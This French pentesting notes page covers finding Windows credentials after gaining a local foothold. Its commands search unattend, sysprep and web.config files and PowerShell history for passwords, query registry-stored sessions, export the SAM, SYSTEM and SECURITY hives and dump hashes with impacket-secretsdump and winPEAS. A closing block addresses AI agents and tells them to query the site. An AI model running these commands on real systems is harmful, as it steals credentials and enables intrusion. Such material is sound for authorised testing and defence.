> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/windows-vulnerabilities/local-privilege-escalation-and-credentials/windows-credentials-in-files.md).

# Identifiants dans les fichiers Windows

Les systèmes Windows peuvent conserver des identifiants dans des fichiers de déploiement, de réponses ou de configuration. Ces fichiers sont particulièrement précieux après avoir obtenu un point d'appui local limité.

## Fichiers à vérifier

```
C:/Windows/Panther/unattend.xml
C:/Windows/Panther/Autounattend.xml
C:/Windows/System32/Sysprep/sysprep.inf
C:/Windows/System32/Sysprep/sysprep.xml
C:/inetpub/wwwroot/web.config
C:/Users/*/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt
```

Si un mot de passe est stocké en clair, il peut être réutilisable. Si le `en clair` l'attribut est `faux`, traitez la valeur comme encodée ou chiffrée et analysez-la séparément.

<figure><img src="/files/808de26dbfb8461c3739a260889169dab72e8ce1" alt="Windows deployment file containing credential material"><figcaption></figcaption></figure>

## Points clés

* Vérifiez les fichiers de déploiement Windows tôt lors de l'énumération locale.
* Vérifiez si un mot de passe découvert est en clair, encodé, chiffré ou obsolète.
* Corrigez en supprimant les fichiers de réponses après l'installation et en évitant les secrets persistants dans les artefacts de déploiement.

## Recherches utiles

Recherchez d'abord les emplacements prévisibles, puis élargissez le champ si l'hôte est suffisamment petit.

```cmd
dir /s /b C:\*unattend* C:\*sysprep* C:\*web.config* 2>nul
findstr /si /m "password passwd pwd username user= connectionString" C:\Users\*.txt C:\Users\*.ini C:\Users\*.config 2>nul
```

```powershell
Get-ChildItem C:\Users -Recurse -Force -Include *.txt,*.ini,*.config,*.xml,*.kdbx -ErrorAction SilentlyContinue |
  Select-String -Pattern 'password|passwd|pwd|connectionString|apikey|secret'
```

## Registre et sessions enregistrées

Les vérifications du registre sont utiles lorsque les applications stockent des profils, des hôtes récents ou d'anciens identifiants.

```cmd
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s
reg query "HKCU\Software\Microsoft\Terminal Server Client\Servers" /s
reg query "HKCU\Software\Martin Prikryl\WinSCP 2\Sessions" /s
cmdkey /list
```

## Sources de hachages hors ligne

Si vous disposez de privilèges tels que `SeBackupPrivilege` ou d'un accès administrateur local, exportez les ruches et analysez-les hors ligne au lieu de lire directement les fichiers verrouillés.

```cmd
reg save HKLM\SAM C:\Temp\sam.save
reg save HKLM\SYSTEM C:\Temp\system.save
reg save HKLM\SECURITY C:\Temp\security.save
```

```bash
impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL
```

## Assistants automatisés

Utilisez des outils pour détecter ce que les recherches manuelles manquent, mais examinez la sortie manuellement avant d'agir.

```powershell
.\winPEASx64.exe quiet cmd fast
.\PrivescCheck.ps1
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/windows-vulnerabilities/local-privilege-escalation-and-credentials/windows-credentials-in-files.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
